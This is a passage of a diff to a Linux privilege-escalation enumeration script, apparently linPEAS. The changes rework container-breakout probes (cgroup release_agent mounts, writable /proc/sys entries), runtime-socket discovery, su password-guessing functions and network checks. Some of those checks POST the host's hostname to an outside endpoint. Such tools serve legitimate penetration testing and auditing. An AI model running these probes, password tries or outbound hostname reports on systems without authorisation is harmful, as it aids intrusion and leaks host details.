$KERNEL_CVE_KERNEL_VERSION\n" + print_list "Data chunk limit ............. max 25 rows per KERNEL_CVE_DATA_* variable (1..21)\n" + if [ -n "$KERNEL_CVE_CFG_SOURCE" ]; then + print_list "Kernel config source ......... $KERNEL_CVE_CFG_SOURCE\n" + else + print_list "Kernel config source ......... " + echo_not_found "not available" + fi + if [ "$KERNEL_CVE_KERNEL_OS" != "Linux" ]; then + print_list "Registry status .............. Linux kernel CVE datasets are not applicable to $KERNEL_CVE_KERNEL_OS\n" | sed -${E} "s,.*,${SED_GREEN}," + return 0 + fi + KERNEL_CVE_MATCHES=0 + while IFS=" " read -r KERNEL_CVE_ID KERNEL_CVE_NAME KERNEL_CVE_REQS KERNEL_CVE_TAGS KERNEL_CVE_RANK KERNEL_CVE_COMMENTS; do + [ -z "$KERNEL_CVE_ID" ] && continue + KERNEL_CVE_TOKEN_OK=1 + if printf "%s" "$KERNEL_CVE_REQS" | grep -Eq '^pkg=|^ver|CONFIG_|sysctl:|cmd:|,pkg=|,ver|,CONFIG_|,sysctl:|,cmd:'; then + KERNEL_CVE_REQ_LINES=$(printf "%s" "$KERNEL_CVE_REQS" | tr ',' '\n') + while IFS= read -r KERNEL_CVE_REQ; do + KERNEL_CVE_REQ=$(printf "%s" "$KERNEL_CVE_REQ" | sed 's/^ *//;s/ *$//') + if ! kercve_eval_req_token "$KERNEL_CVE_REQ"; then + KERNEL_CVE_TOKEN_OK=0 + break + fi + done < ... + # while others store: ... + # Normalize whichever column contains the CVE identifier, but keep printing + # all matched vulns even when no CVE exists for that row. + KERNEL_CVE_ID_RAW="$KERNEL_CVE_ID" + KERNEL_CVE_ID_NORM=$(kercve_normalize_cve_list "$KERNEL_CVE_ID_RAW") + if [ -z "$KERNEL_CVE_ID_NORM" ]; then + KERNEL_CVE_ID_NORM=$(kercve_normalize_cve_list "$KERNEL_CVE_NAME") + if [ -n "$KERNEL_CVE_ID_NORM" ]; then + KERNEL_CVE_NAME="$KERNEL_CVE_ID_RAW" + fi + fi + if [ "$KERNEL_CVE_NAME" = "N/A" ] || [ "$KERNEL_CVE_NAME" = "n/a" ] || [ "$KERNEL_CVE_NAME" = "N\\A" ]; then + KERNEL_CVE_NAME="" + fi + if [ "$KERNEL_CVE_ID_RAW" = "N/A" ] || [ "$KERNEL_CVE_ID_RAW" = "n/a" ] || [ "$KERNEL_CVE_ID_RAW" = "N\\A" ]; then + KERNEL_CVE_ID_RAW="" + fi + KERNEL_CVE_PRINT_ID="$KERNEL_CVE_ID_NORM" + if [ -z "$KERNEL_CVE_PRINT_ID" ] && printf "%s" "$KERNEL_CVE_ID_RAW" | grep -Eq '^CVE-|^[0-9]{4}-[0-9]+$'; then + KERNEL_CVE_PRINT_ID=$(kercve_normalize_cve_list "$KERNEL_CVE_ID_RAW") + fi + KERNEL_CVE_MATCHES=$((KERNEL_CVE_MATCHES + 1)) + kercve_print_match "$KERNEL_CVE_PRINT_ID" "$KERNEL_CVE_NAME" "$KERNEL_CVE_REQS" "$KERNEL_CVE_TAGS" "$KERNEL_CVE_RANK" "$KERNEL_CVE_COMMENTS" + done </dev/null); do + if unshare -UrmC --propagation=unchanged sh -c "mount -t cgroup -o $ss cgroup /tmp/cgroup_3628d4 >/dev/null 2>&1 && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then + release_agent_breakout3="Yes (unshare with $ss)" + umount /tmp/cgroup_3628d4 >/dev/null 2>&1 + rm -rf /tmp/cgroup_3628d4 >/dev/null 2>&1 + break + fi + umount /tmp/cgroup_3628d4 >/dev/null 2>&1 + rm -rf /tmp/cgroup_3628d4 >/dev/null 2>&1 + done +} + echo_no (){ printf $DG"No\n"$NC } +inDockerGroup() { + DOCKER_GROUP="No" + if groups 2>/dev/null | grep -q '\bdocker\b'; then + DOCKER_GROUP="Yes" + fi +} + checkDockerVersionExploits() { if echo "$dockerVersion" | grep -iq "not found"; then VULN_CVE_2019_13139="$(echo_not_found)" @@ -1197,56 +2441,6 @@ checkDockerVersionExploits() { fi } -inDockerGroup() { - DOCKER_GROUP="No" - if groups 2>/dev/null | grep -q '\bdocker\b'; then - DOCKER_GROUP="Yes" - fi -} - -enumerateDockerSockets() { - dockerVersion="$(echo_not_found)" - if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then - SEARCHED_DOCKER_SOCKETS="1" - for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then - if echo "$int_sock" | grep -Eq "docker"; then - dock_sock="$int_sock" - echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" - echo "Docker enummeration:" - docker_enumerated="" - if [ "$(command -v curl || echo -n '')" ]; then - sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) - echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi - fi - if [ "$(command -v docker || echo -n '')" ] && ! [ "$docker_enumerated" ]; then - sockInfoResponse="$(docker info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) - printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - fi - else - echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g" - fi - else - echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g" - fi - done - fi -} - -checkCreateReleaseAgent(){ - cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r ss - do - if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $ss cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then - release_agent_breakout3="Yes (unshare with $ss)"; - rm -rf /tmp/cgroup_3628d4 - break - fi - done -} - checkDockerRootless() { DOCKER_ROOTLESS="No" if docker info 2>/dev/null|grep -q rootless; then @@ -1254,6 +2448,97 @@ checkDockerRootless() { fi } +checkProcSysBreakouts(){ + can_open_for_write() { + if [ -e "$1" ] && command -v dd >/dev/null 2>&1 && dd if=/dev/null of="$1" bs=1 count=0 conv=notrunc >/dev/null 2>&1; then + echo Yes + else + echo No + fi + } + dev_mounted="No" + if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then + dev_mounted="Yes"; + fi + proc_mounted="No" + if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then + proc_mounted="Yes"; + fi + if command -v unshare >/dev/null 2>&1 && command -v sh >/dev/null 2>&1; then + run_unshare=$(unshare -UrmC sh -c 'echo -n Yes' 2>/dev/null) + fi + if ! [ "$run_unshare" = "Yes" ]; then + run_unshare="No" + fi + if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then + release_agent_breakout1="Yes" + else + release_agent_breakout1="No" + fi + release_agent_breakout2="No" + mkdir -p /tmp/cgroup_3628d4 + mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + umount /tmp/cgroup_3628d4 >/dev/null 2>&1 + rm -rf /tmp/cgroup_3628d4 + else + mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + umount /tmp/cgroup_3628d4 >/dev/null 2>&1 + rm -rf /tmp/cgroup_3628d4 + else + checkCreateReleaseAgent + fi + fi + rm -rf /tmp/cgroup_3628d4 2>/dev/null + # Prefer zero-byte open-for-write checks here so special files are validated more accurately without trying to change their contents. + core_pattern_breakout="$(can_open_for_write /proc/sys/kernel/core_pattern)" + modprobe_binary="$(ls -l "$(cat /proc/sys/kernel/modprobe 2>/dev/null)" 2>/dev/null || echo No)" + modprobe_config_writable="$(can_open_for_write /proc/sys/kernel/modprobe)" + panic_on_oom_dos="$(can_open_for_write /proc/sys/vm/panic_on_oom)" + panic_sys_fs_dos="$(can_open_for_write /proc/sys/fs/suid_dumpable)" + binfmt_misc_breakout="$(can_open_for_write /proc/sys/fs/binfmt_misc/register)" + proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)" + sysreq_trigger_dos="$(can_open_for_write /proc/sysrq-trigger)" + kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)" # Kernel Exploit Dev + kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev + self_mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" + if [ "$(head -n 1 /proc/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi + kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" + kmem_writable="$(can_open_for_write /proc/kmem)" + mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" + mem_writable="$(can_open_for_write /proc/mem)" + sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)" + mountinfo_readable="No" + for mountinfo_file in /proc/[0-9]*/mountinfo; do + if [ -r "$mountinfo_file" ]; then + mountinfo_readable="Yes" + break + fi + done + uevent_helper_breakout="$(can_open_for_write /sys/kernel/uevent_helper)" + vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)" + security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)" + security_writable="$([ -w /sys/kernel/security ] 2>/dev/null && echo Yes || echo No)" + efi_vars_writable="$([ -w /sys/firmware/efi/vars ] 2>/dev/null && echo Yes || echo No)" + efi_efivars_writable="$([ -w /sys/firmware/efi/efivars ] 2>/dev/null && echo Yes || echo No)" + proc_keys_readable="$( (head -n 1 /proc/keys > /dev/null && echo Yes) 2>/dev/null || echo No)" + proc_timer_list_readable="$( (head -n 1 /proc/timer_list > /dev/null && echo Yes) 2>/dev/null || echo No)" + sys_firmware_readable="$([ -r /sys/firmware ] 2>/dev/null && echo Yes || echo No)" + debugfs_present="$([ -d /sys/kernel/debug ] 2>/dev/null && echo Yes || echo No)" + debugfs_readable="$( (ls -la /sys/kernel/debug > /dev/null && echo Yes) 2>/dev/null || echo No)" + thermal_present="$([ -d /sys/class/thermal ] 2>/dev/null && echo Yes || echo No)" + thermal_readable="No" + for thermal_file in /sys/class/thermal/*/*; do + if [ -f "$thermal_file" ] && [ -r "$thermal_file" ]; then + thermal_readable="Yes" + break + fi + done +} + checkContainerExploits() { VULN_CVE_2019_5021="$(echo_no)" if [ -f "/etc/alpine-release" ]; then @@ -1264,63 +2549,69 @@ checkContainerExploits() { fi } -checkProcSysBreakouts(){ - dev_mounted="No" - if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then - dev_mounted="Yes"; +enumerateDockerSockets() { + dockerVersion="$(echo_not_found)" + if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then + SEARCHED_DOCKER_SOCKETS="1" + OLDIFS="$IFS" + IFS=' +' + # NOTE: This is intentionally "lightweight" (checks common runtime socket names) and avoids + # pseudo filesystems (/sys, /proc) to reduce noise and latency. + for int_sock in $(find / \ + -path "/sys" -prune -o \ + -path "/proc" -prune -o \ + -type s \( \ + -name "docker.sock" -o \ + -name "docker.socket" -o \ + -name "cri-dockerd.sock" -o \ + -name "dockershim.sock" -o \ + -name "containerd.sock" -o \ + -name "containerd.sock.ttrpc" -o \ + -name "crio.sock" -o \ + -name "podman.sock" -o \ + -name "kubelet.sock" -o \ + -name "buildkitd.sock" -o \ + -name "buildkit.sock" -o \ + -name "firecracker-containerd.sock" -o \ + -name "frakti.sock" -o \ + -name "rktlet.sock" \ + \) -print 2>/dev/null); do + # Basic permissions hint (you generally need write perms to connect to a unix socket). + if [ -w "$int_sock" ]; then + if echo "$int_sock" | grep -Eq "docker"; then + echo "You have write permissions over Docker socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED_YELLOW},g" + else + echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g" + fi + else + echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g" + fi + # Validate whether this looks like a Docker-compatible API socket (amicontained-style) when curl exists. + docker_enumerated="" + if [ "$(command -v curl 2>/dev/null || echo -n '')" ]; then + sockInfoResponse="$(curl -s --max-time 2 --unix-socket "$int_sock" http://localhost/info 2>/dev/null)" + if echo "$sockInfoResponse" | grep -q "ServerVersion"; then + echo "Valid Docker API socket: $int_sock" | sed -${E} "s,$int_sock,${SED_RED_YELLOW},g" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) + echo "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + docker_enumerated="1" + fi + fi + # Fallback to docker CLI if curl is missing or the /info request didn't work. + # Use DOCKER_HOST so we can target non-default socket paths when possible. + if [ "$(command -v docker 2>/dev/null || echo -n '')" ] && ! [ "$docker_enumerated" ]; then + if [ -w "$int_sock" ] && echo "$int_sock" | grep -Eq "docker"; then + sockInfoResponse="$(DOCKER_HOST="unix://$int_sock" docker info 2>/dev/null)" + if [ "$sockInfoResponse" ]; then + dockerVersion=$(echo "$sockInfoResponse" | grep -i "^ Server Version:" | awk '{print $4}' | head -n 1) + printf "%s\n" "$sockInfoResponse" | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + fi + fi + fi + done + IFS="$OLDIFS" fi - proc_mounted="No" - if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then - proc_mounted="Yes"; - fi - run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null) - if ! [ "$run_unshare" = "Yes" ]; then - run_unshare="No" - fi - if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then - release_agent_breakout1="Yes" - else - release_agent_breakout1="No" - fi - release_agent_breakout2="No" - mkdir /tmp/cgroup_3628d4 - mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null - if [ $? -eq 0 ]; then - release_agent_breakout2="Yes"; - rm -rf /tmp/cgroup_3628d4 - else - mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null - if [ $? -eq 0 ]; then - release_agent_breakout2="Yes"; - rm -rf /tmp/cgroup_3628d4 - else - checkCreateReleaseAgent - fi - fi - rm -rf /tmp/cgroup_3628d4 2>/dev/null - core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)" - modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)" - panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)" - panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)" - binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)" - proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)" - sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)" - kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)" # Kernel Exploit Dev - kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev - self_mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" - if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi - kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" - kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" - mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" - mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" - sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)" - mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)" - uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)" - vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)" - security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)" - security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)" - efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)" - efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)" } containerCheck() { @@ -1330,7 +2621,7 @@ containerCheck() { if [ -f "/.dockerenv" ] || grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || grep -qai docker /proc/self/cgroup 2>/dev/null || - [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then + [ -f "/run/.dockerenv" ] ; then inContainer="1" containerType="docker\n" fi @@ -1353,27 +2644,43 @@ containerCheck() { if env | grep "container=lxc" -qa 2>/dev/null || grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then inContainer="1" - containerType="lxc\n" + if echo "$containerType" | grep -qv "lxc"; then + if [ "$containerType" ] && [ "$containerType" != "$(echo_no)" ]; then containerType="$containerType (lxc)\n" + else containerType="lxc\n" + fi + fi fi # Are we inside podman? - if env | grep -qa "container=podman" 2>/dev/null || + if [ -f "/run/.containerenv" ] || + env | grep -qa "container=podman" 2>/dev/null || grep -qa "container=podman" /proc/1/environ 2>/dev/null; then inContainer="1" - containerType="podman\n" + if echo "$containerType" | grep -qv "podman"; then + if [ "$containerType" ] && [ "$containerType" != "$(echo_no)" ]; then containerType="$containerType (podman)\n" + else containerType="podman\n" + fi + fi fi # Check for other container platforms that report themselves in PID 1 env if [ -z "$inContainer" ]; then - if grep -a 'container=' /proc/1/environ 2>/dev/null; then + if grep -qa 'container=' /proc/1/environ 2>/dev/null; then inContainer="1" - containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n" + containerType="$(tr '\000' '\n' < /proc/1/environ 2>/dev/null | awk -F= '/^container=/{print $2; exit}')\n" fi fi } -check_az_automation_acc(){ - is_az_automation_acc="No" - if env | grep -iq "azure" && env | grep -iq "AutomationServiceEndpoint"; then - is_az_automation_acc="Yes" +check_aliyun_ecs(){ + is_aliyun_ecs="No" + if [ -f "/etc/cloud/cloud.cfg.d/aliyun_cloud.cfg" ]; then + is_aliyun_ecs="Yes" + fi +} + +check_do(){ + is_do="No" + if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then + is_do="Yes" fi } @@ -1384,6 +2691,13 @@ check_tencent_cvm () { fi } +check_az_automation_acc(){ + is_az_automation_acc="No" + if env | grep -iq "azure" && env | grep -iq "AutomationServiceEndpoint"; then + is_az_automation_acc="Yes" + fi +} + check_ibm_vm(){ is_ibm_vm="No" if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then @@ -1395,20 +2709,6 @@ check_ibm_vm(){ fi } -check_do(){ - is_do="No" - if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then - is_do="Yes" - fi -} - -check_aliyun_ecs(){ - is_aliyun_ecs="No" - if [ -f "/etc/cloud/cloud.cfg.d/aliyun_cloud.cfg" ]; then - is_aliyun_ecs="Yes" - fi -} - check_aws_ec2(){ is_aws_ec2="No" is_aws_ec2_beanstalk="No" @@ -1528,15 +2828,15 @@ print_ps(){ done) 2>/dev/null | sort -r } -check_tcp_443(){ - local TIMEOUT_INTERNET_SECONDS_443=$1 +check_tcp_80(){ + local TIMEOUT_INTERNET_SECONDS_80=$1 if ! [ -f "/bin/bash" ]; then echo " /bin/bash not found" return fi # example.com - (bash -c '(echo >/dev/tcp/104.18.74.230/443 2>/dev/null && echo "Port 443 is accessible" && exit 0) 2>/dev/null || echo "Port 443 is not accessible"') & local_pid=$! - sleep $TIMEOUT_INTERNET_SECONDS_443 && kill -9 $local_pid 2>/dev/null && echo "Port 443 is not accessible" + (bash -c '(echo >/dev/tcp/104.18.74.230/80 2>/dev/null && echo "Port 80 is accessible" && exit 0) 2>/dev/null || echo "Port 80 is not accessible"') & local_pid=$! + sleep $TIMEOUT_INTERNET_SECONDS_80 && kill -9 $local_pid 2>/dev/null && echo "Port 80 is not accessible" } check_dns(){ @@ -1561,44 +2861,22 @@ check_icmp(){ sleep $TIMEOUT_INTERNET_SECONDS_ICMP && kill -9 $local_pid 2>/dev/null && echo "ICMP is not accessible" } -check_external_hostname(){ - INTERNET_SEARCH_TIMEOUT=15 - # wget or curl? - if command -v curl >/dev/null 2>&1; then - curl "https://2e6ppt7izvuv66qmx2r3et2ufi0mxwqs.lambda-url.us-east-1.on.aws/" -H "User-Agent: linpeas" -d "{\"hostname\":\"$(hostname)\"}" -H "Content-Type: application/json" --max-time "$INTERNET_SEARCH_TIMEOUT" - elif command -v wget >/dev/null 2>&1; then - wget -q -O - "https://2e6ppt7izvuv66qmx2r3et2ufi0mxwqs.lambda-url.us-east-1.on.aws/" --header "User-Agent: linpeas" --post-data "{\"hostname\":\"$(hostname)\"}" -H "Content-Type: application/json" --timeout "$INTERNET_SEARCH_TIMEOUT" - else - echo "wget or curl not found" - fi -} - -check_tcp_80(){ - local TIMEOUT_INTERNET_SECONDS_80=$1 - if ! [ -f "/bin/bash" ]; then - echo " /bin/bash not found" - return - fi - # example.com - (bash -c '(echo >/dev/tcp/104.18.74.230/80 2>/dev/null && echo "Port 80 is accessible" && exit 0) 2>/dev/null || echo "Port 80 is not accessible"') & local_pid=$! - sleep $TIMEOUT_INTERNET_SECONDS_80 && kill -9 $local_pid 2>/dev/null && echo "Port 80 is not accessible" -} - su_try_pwd(){ BFUSER=$1 PASSWORDTRY=$2 trysu=$(echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null) - if [ "$trysu" ]; then + if [ $? -eq 0 ]; then echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi } check_tcp_443_bin () { local TIMEOUT_INTERNET_SECONDS_443_BIN=$1 - local url_lambda="https://2e6ppt7izvuv66qmx2r3et2ufi0mxwqs.lambda-url.us-east-1.on.aws/" + local url_lambda="https://tools.hacktricks.wiki/api/host-checker" if command -v curl >/dev/null 2>&1; then if curl -s --connect-timeout $TIMEOUT_INTERNET_SECONDS_443_BIN "$url_lambda" \ - -H "User-Agent: linpeas" -H "Content-Type: application/json" >/dev/null 2>&1 + -H "User-Agent: linpeas" -H "Content-Type: application/json" \ + -d "{\"hostname\":\"$(hostname)\"}" >/dev/null 2>&1 then echo "Port 443 is accessible with curl" return 0 # ✅ success @@ -1608,7 +2886,8 @@ check_tcp_443_bin () { fi elif command -v wget >/dev/null 2>&1; then if wget -q --timeout=$TIMEOUT_INTERNET_SECONDS_443_BIN -O - "$url_lambda" \ - --header "User-Agent: linpeas" -H "Content-Type: application/json" >/dev/null 2>&1 + --header "User-Agent: linpeas" -H "Content-Type: application/json" \ + --post-data "{\"hostname\":\"$(hostname)\"}" >/dev/null 2>&1 then echo "Port 443 is accessible with wget" return 0 @@ -1622,11 +2901,26 @@ check_tcp_443_bin () { fi } -check_if_su_brute(){ - EXISTS_SU="$(command -v su 2>/dev/null || echo -n '')" - error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1); - if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must be run from a terminal"; then - echo "1" +check_tcp_443(){ + local TIMEOUT_INTERNET_SECONDS_443=$1 + if ! [ -f "/bin/bash" ]; then + echo " /bin/bash not found" + return + fi + # example.com + (bash -c '(echo >/dev/tcp/104.18.74.230/443 2>/dev/null && echo "Port 443 is accessible" && exit 0) 2>/dev/null || echo "Port 443 is not accessible"') & local_pid=$! + sleep $TIMEOUT_INTERNET_SECONDS_443 && kill -9 $local_pid 2>/dev/null && echo "Port 443 is not accessible" +} + +check_external_hostname(){ + INTERNET_SEARCH_TIMEOUT=15 + # wget or curl? + if command -v curl >/dev/null 2>&1; then + curl "https://tools.hacktricks.wiki/api/host-checker" -H "User-Agent: linpeas" -d "{\"hostname\":\"$(hostname)\"}" -H "Content-Type: application/json" --max-time "$INTERNET_SEARCH_TIMEOUT" + elif command -v wget >/dev/null 2>&1; then + wget -q -O - "https://tools.hacktricks.wiki/api/host-checker" --header "User-Agent: linpeas" --post-data "{\"hostname\":\"$(hostname)\"}" -H "Content-Type: application/json" --timeout "$INTERNET_SEARCH_TIMEOUT" + else + echo "wget or curl not found" fi } @@ -1646,6 +2940,14 @@ su_brute_user_num(){ wait } +check_if_su_brute(){ + EXISTS_SU="$(command -v su 2>/dev/null || echo -n '')" + error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1); + if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must be run from a terminal"; then + echo "1" + fi +} + get_current_user_privot_pid(){ CURRENT_USER_PIVOT_PID="" if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then @@ -1673,10 +2975,6 @@ warn_exec(){ $* 2>/dev/null || echo_not_found $1 } -print_list(){ - printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═" -} - check_critial_root_path(){ folder_path="$1" if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi @@ -1735,8 +3033,10 @@ search_for_regex(){ if echo $CHECKS | grep -q system_information; then +if check_mitre_filter "T1082,T1552.007,T1518.001,T1547.006,T1068,T1548.003,T1574.007,T1120"; then print_title "System Information" -print_2title "Operative system" +if check_mitre_filter "T1082"; then +print_2title "Operative system" "T1082" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits" (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," warn_exec lsb_release -a 2>/dev/null @@ -1745,7 +3045,10 @@ if [ "$MACPEAS" ]; then fi echo "" -print_2title "Sudo version" +fi + +if check_mitre_filter "T1548.003,T1068"; then +print_2title "Sudo version" "T1548.003,T1068" if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version" sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," @@ -1753,8 +3056,11 @@ else echo_not_found "sudo" fi echo "" +fi + +if check_mitre_filter "T1548.003,T1068"; then if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then - print_2title "USBCreator" + print_2title "USBCreator" 